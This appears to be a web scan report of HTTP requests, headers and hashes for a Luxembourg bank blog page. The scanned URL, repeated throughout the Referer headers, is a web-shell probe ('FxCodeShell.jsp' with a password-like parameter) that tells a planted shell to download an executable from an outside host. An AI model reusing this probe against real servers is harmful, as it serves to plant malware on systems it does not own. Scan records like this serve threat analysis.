URL: https://cse.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee

Protocol

Security

TLS 1.2, ECDHE_ECDSA, AES_128_GCM

Server

2a00:1450:4001:817::2004 , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

sffe /

Resource Hash

a295bcfa91664e0dfac547516febc524302c24be2ddb9cf90ceda80b1e8f19aa

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	1; mode=block

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

date: Thu, 14 Mar 2019 15:42:56 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Tue, 12 Mar 2019 20:14:44 GMT
server: sffe
age: 2074072
vary: Accept-Encoding
content-type: text/css
status: 200
cache-control: public, max-age=31536000
accept-ranges: bytes
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 9940
x-xss-protection: 1; mode=block
expires: Fri, 13 Mar 2020 15:42:56 GMT

GET
H2 200 default.css
www.google.com/cse/static/style/look/v2/ 14 KB
3 KB 8ms
8ms Stylesheet
text/css 2a00:1450:4001:817::2004
Google LLC

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google.com/cse/static/style/look/v2/default.css

Requested by

Host: cse.google.com
URL: https://cse.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee

Protocol

Security

TLS 1.2, ECDHE_ECDSA, AES_128_GCM

Server

2a00:1450:4001:817::2004 , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

sffe /

Resource Hash

8cda73e6a0e5533a80c6bf94cf5a7b2a0e399ea1c482399b11a21096a8081faa

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

date: Sun, 07 Apr 2019 15:10:39 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Mon, 15 Oct 2018 12:00:00 GMT
server: sffe
age: 2409
vary: Accept-Encoding
content-type: text/css
status: 200
cache-control: public, max-age=3000
accept-ranges: bytes
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 3112
x-xss-protection: 0
expires: Sun, 07 Apr 2019 16:00:39 GMT

GET
H2 200 async-ads.js Show response
cse.google.com/adsense/search/ 171 KB
59 KB 40ms
40ms Script
text/javascript 2a00:1450:4001:809::200e
Google LLC

General

Check archive.org

Show headers Download Go to

Full URL

https://cse.google.com/adsense/search/async-ads.js

Requested by

Host: www.google.com
URL: https://www.google.com/cse/static/element/af400e744a60d2b3/cse_element__en.js?usqp=CAI%3D

Protocol

Security

TLS 1.2, ECDHE_ECDSA, AES_128_GCM

Server

2a00:1450:4001:809::200e , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

sffe /

Resource Hash

e5e47a45fb49db9914d3aa8788addcc661e6cc25f43bccf214cf7e14a39266d0

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

date: Sun, 07 Apr 2019 15:50:48 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "8672225924171704016"
vary: Accept-Encoding
content-type: text/javascript; charset=UTF-8
status: 200
cache-control: private, max-age=3600
accept-ranges: bytes
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
x-xss-protection: 0
expires: Sun, 07 Apr 2019 15:50:48 GMT

GET
H2 200 googlelogo_grey_46x15dp.png
www.google.com/cse/static/images/1x/ 919 B
1 KB 7ms
6ms Image
image/png 2a00:1450:4001:817::2004
Google LLC

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://www.google.com/cse/static/images/1x/googlelogo_grey_46x15dp.png

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

Security

TLS 1.2, ECDHE_ECDSA, AES_128_GCM

Server

2a00:1450:4001:817::2004 , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

sffe /

Resource Hash

a844cdc48c7591822e45128a138f1dbba5753a3ca9992bd71c36758d51d0b68e

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	1; mode=block

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

date: Sat, 09 Mar 2019 00:34:59 GMT
x-content-type-options: nosniff
last-modified: Tue, 13 Dec 2016 15:00:00 GMT
server: sffe
age: 2560549
content-type: image/png
status: 200
cache-control: public, max-age=31536000
accept-ranges: bytes
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 919
x-xss-protection: 1; mode=block
expires: Sun, 08 Mar 2020 00:34:59 GMT

GET
H2 204 generate_204
clients1.google.com/ 0
85 B 45ms
5ms Image
text/plain 2a00:1450:4001:81a::200e
Google LLC

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://clients1.google.com/generate_204
Requested by: Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Protocol: H2
Security: TLS 1.2, ECDHE_ECDSA, AES_128_GCM
Server: 2a00:1450:4001:81a::200e , Ireland, ASN15169 (GOOGLE - Google LLC, US),
Reverse DNS
Software: /
Resource Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

status: 204
date: Sun, 07 Apr 2019 15:50:48 GMT
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 0

GET
H/1.1 200
OK /
193.178.219.134/combo/ 320 B
735 B 43ms
42ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/aui/widget-base/assets/skins/sam/widget-base.css

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

066f6b6a7156547c56d832c48edb36094447c070f21aef49a82cc803c604e313

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:44 GMT
Connection: Keep-Alive
Content-Length: 173
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "c4d2803b"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=94
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H/1.1 200
OK available_languages.jsp Show response
193.178.219.134/html/js/liferay/ 658 B
715 B 39ms
38ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/html/js/liferay/available_languages.jsp?browserId=other&themeId=blblog_WAR_blblogtheme&colorSchemeId=bli&minifierType=js&languageId=en_US&b=6205&t=1553406106270

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

8f3dbff224b05a2f0a3a2273b3bdcb0dba3cdd8ce5e91aa91b2637b7980215eb

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Server: Apache-Coyote/1.1
Date: Sun, 07 Apr 2019 15:50:44 GMT
X-Frame-Options: SAMEORIGIN SAMEORIGIN
Content-Type: text/javascript
Transfer-Encoding: chunked
Connection: Keep-Alive
Keep-Alive: timeout=15, max=93
X-XSS-Protection: 1

GET
H/1.1 200
OK / Show response
193.178.219.134/combo/ 31 KB
11 KB 49ms
48ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/liferay/language.js&/html/js/aui/transition/transition-min.js&/html/js/aui/base-core/base-core-min.js&/html/js/aui/base-observable/base-observable-min.js&/html/js/aui/querystring-stringify/querystring-stringify-min.js&/html/js/aui/aui-widget-cssclass/aui-widget-cssclass-min.js&/html/js/aui/aui-widget-toggle/aui-widget-toggle-min.js&/html/js/aui/base-build/base-build-min.js&/html/js/aui/cookie/cookie-min.js&/html/js/liferay/session.js&/html/js/aui/aui-io-request/aui-io-request-min.js&/html/js/liferay/ajax_session.js

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

ea5bf205d1751589f41472ecdd252f11945717ad715ab67f6c3a0375e05ac465

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:44 GMT
Connection: Keep-Alive
Content-Length: 10948
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "4580c3d1"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=93
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H/1.1 200
OK piwik.php
stats.banquedeluxembourg.com/ 43 B
340 B 113ms
113ms Image
image/gif 193.178.219.143

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://stats.banquedeluxembourg.com/piwik.php?action_name=Page%20not%20available%20-%20BL%20Investments%20Blog&idsite=4&rec=1&r=168878&h=15&m=50&s=48&url=https%3A%2F%2F193.178.219.134%2Fen%2Fbank%2Fblinvestmentsblog%2FFxCodeShell.jsp%3Fview%3DFxxkMyLie1836710Aa%26os%3D1%26address%3Dhttp%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&_id=93e5212131e31c4b&_idts=1554652248&_idvc=1&_idn=0&_refts=0&_viewts=1554652248&send_image=1&cookie=1&res=1600x1200&gt_ms=264&pv_id=9fTHv7

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.143 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache /

Resource Hash

548f2d6f4d0d820c6c5ffbeffcbd7f0e73193e2932eefe542accc84762deec87

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN, sameorigin
X-Xss-Protection	1; mode=block

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date: Sun, 07 Apr 2019 15:50:48 GMT
X-Content-Type-Options: nosniff
Server: Apache
X-Frame-Options: SAMEORIGIN, sameorigin
Content-Type: image/gif
Connection: Keep-Alive
Keep-Alive: timeout=15, max=99
Content-Length: 43
X-XSS-Protection: 1; mode=block

GET
H/1.1 200
OK /
193.178.219.134/combo/ 9 KB
2 KB 47ms
46ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/aui/widget-stack/assets/skins/sam/widget-stack.css&/html/js/aui/cssbutton/cssbutton-min.css&/html/js/aui/widget-modality/assets/skins/sam/widget-modality.css&/html/js/aui/resize-base/assets/skins/sam/resize-base.css

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

590ee9fd7d08ba06adf6f2e743610e70a16e0981789d87744260e07963eb040a

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1; _pk_id.4.2706=93e5212131e31c4b.1554652248.1.1554652248.1554652248.; _pk_ses.4.2706=*; LFR_SESSION_STATE_10161=1554652248322
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:44 GMT
Connection: Keep-Alive
Content-Length: 1761
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "3d7c86c3"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=92
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H/1.1 200
OK / Show response
193.178.219.134/combo/ 48 KB
15 KB 63ms
62ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/liferay/hudcrumbs.js&/html/js/aui/async-queue/async-queue-min.js&/html/js/aui/gesture-simulate/gesture-simulate-min.js&/html/js/liferay/navigation_interaction.js&/html/js/aui/aui-parse-content/aui-parse-content-min.js&/html/js/aui/escape/escape-min.js&/html/js/liferay/portlet_url.js&/html/js/aui/widget-position/widget-position-min.js&/html/js/aui/widget-stack/widget-stack-min.js&/html/js/aui/widget-position-align/widget-position-align-min.js&/html/js/aui/widget-position-constrain/widget-position-constrain-min.js&/html/js/aui/widget-stdmod/widget-stdmod-min.js&/html/js/aui/aui-overlay-base-deprecated/aui-overlay-base-deprecated-min.js&/html/js/aui/aui-overlay-mask-deprecated/aui-overlay-mask-deprecated-min.js&/html/js/aui/aui-loading-mask-deprecated/aui-loading-mask-deprecated-min.js&/html/js/aui/aui-dialog-iframe-deprecated/aui-dialog-iframe-deprecated-min.js&/html/js/aui/widget-autohide/widget-autohide-min.js

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

6a165bed92b991154cdd11bdfedcc0edf3d76e1b51f462593f2818eca6934b2e

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1; _pk_id.4.2706=93e5212131e31c4b.1554652248.1.1554652248.1554652248.; _pk_ses.4.2706=*; LFR_SESSION_STATE_10161=1554652248322
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:44 GMT
Connection: Keep-Alive
Content-Length: 15067
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "7639d382"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=91
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H/1.1 200
OK / Show response
193.178.219.134/combo/ 71 KB
21 KB 53ms
52ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/aui/button-core/button-core-min.js&/html/js/aui/button-plugin/button-plugin-min.js&/html/js/aui/widget-buttons/widget-buttons-min.js&/html/js/aui/widget-modality/widget-modality-min.js&/html/js/aui/dd-ddm-base/dd-ddm-base-min.js&/html/js/aui/dd-drag/dd-drag-min.js&/html/js/aui/dd-plugin/dd-plugin-min.js&/html/js/aui/dd-constrain/dd-constrain-min.js&/html/js/aui/event-flick/event-flick-min.js&/html/js/aui/event-valuechange/event-valuechange-min.js&/html/js/aui/event-tap/event-tap-min.js&/html/js/aui/dd-ddm/dd-ddm-min.js&/html/js/aui/dd-ddm-drop/dd-ddm-drop-min.js&/html/js/aui/dd-drop/dd-drop-min.js&/html/js/aui/dd-drop-plugin/dd-drop-plugin-min.js&/html/js/aui/dd-delegate/dd-delegate-min.js&/html/js/aui/resize-base/resize-base-min.js&/html/js/aui/resize-plugin/resize-plugin-min.js&/html/js/aui/button/button-min.js&/html/js/aui/button-group/button-group-min.js&/html/js/aui/aui-button-core/aui-button-core-min.js

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

80b32a9db0ef4f91ecb26477d09f76c3501fab2bcba7914d9407fea040954e6e

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1; _pk_id.4.2706=93e5212131e31c4b.1554652248.1.1554652248.1554652248.; _pk_ses.4.2706=*; LFR_SESSION_STATE_10161=1554652248322
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:44 GMT
Connection: Keep-Alive
Content-Length: 21194
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "c77a696e"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=92
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H/1.1 200
OK / Show response
193.178.219.134/combo/ 15 KB
6 KB 36ms
35ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/aui/aui-toolbar/aui-toolbar-min.js&/html/js/aui/aui-widget-toolbars/aui-widget-toolbars-min.js&/html/js/aui/aui-modal/aui-modal-min.js&/html/js/liferay/widget_zindex.js&/html/js/liferay/util_window.js&/html/js/liferay/sign_in_modal.js

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

0aeb79d2db9704564b484763a6a650c01503b724dfdc0dc89acc91414b4b4926

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1; _pk_id.4.2706=93e5212131e31c4b.1554652248.1.1554652248.1554652248.; _pk_ses.4.2706=*; LFR_SESSION_STATE_10161=1554652248322
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:44 GMT
Connection: Keep-Alive
Content-Length: 5425
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "c35822a6"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=95
